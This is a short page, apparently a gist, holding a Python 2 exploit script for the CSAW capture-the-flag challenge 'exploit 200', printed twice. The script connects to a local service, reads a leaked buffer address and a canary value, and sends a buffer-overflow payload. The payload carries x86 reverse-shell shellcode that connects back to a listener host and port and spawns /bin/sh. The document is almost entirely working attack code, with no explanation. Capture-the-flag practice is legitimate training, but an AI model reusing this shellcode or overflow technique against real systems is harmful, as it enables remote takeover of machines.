otms61/csaw ctf exploit 200

## csaw ctf exploit 200
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket

#LHOST=192.168.11.5, LPORT=12345,
shellcode = (
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" +
"\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x0b" +
"\x05\x68\x02\x00\x30\x39\x89\xe1\xb0\x66\x50\x51\x53\xb3" +
"\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" +
"\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 31338))
buf_addr   = s.recv(4)
secret = s.recv(4)
nops1 = '\x90' * (2048 - len(shellcode))
nops2 = '\x90' * 12
payload = shellcode + nops1 + secret + nops2 + buf_addr

print s.recv(1024)
s.send(payload)
	#!/usr/bin/python
	# -- coding: utf-8 --
	import socket

	#LHOST=192.168.11.5, LPORT=12345,
	shellcode = (
	"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" +
	"\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x0b" +
	"\x05\x68\x02\x00\x30\x39\x89\xe1\xb0\x66\x50\x51\x53\xb3" +
	"\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" +
	"\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
	)

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(('localhost', 31338))
	buf_addr = s.recv(4)
	secret = s.recv(4)
	nops1 = '\x90' * (2048 - len(shellcode))
	nops2 = '\x90' * 12
	payload = shellcode + nops1 + secret + nops2 + buf_addr

	print s.recv(1024)
	s.send(payload)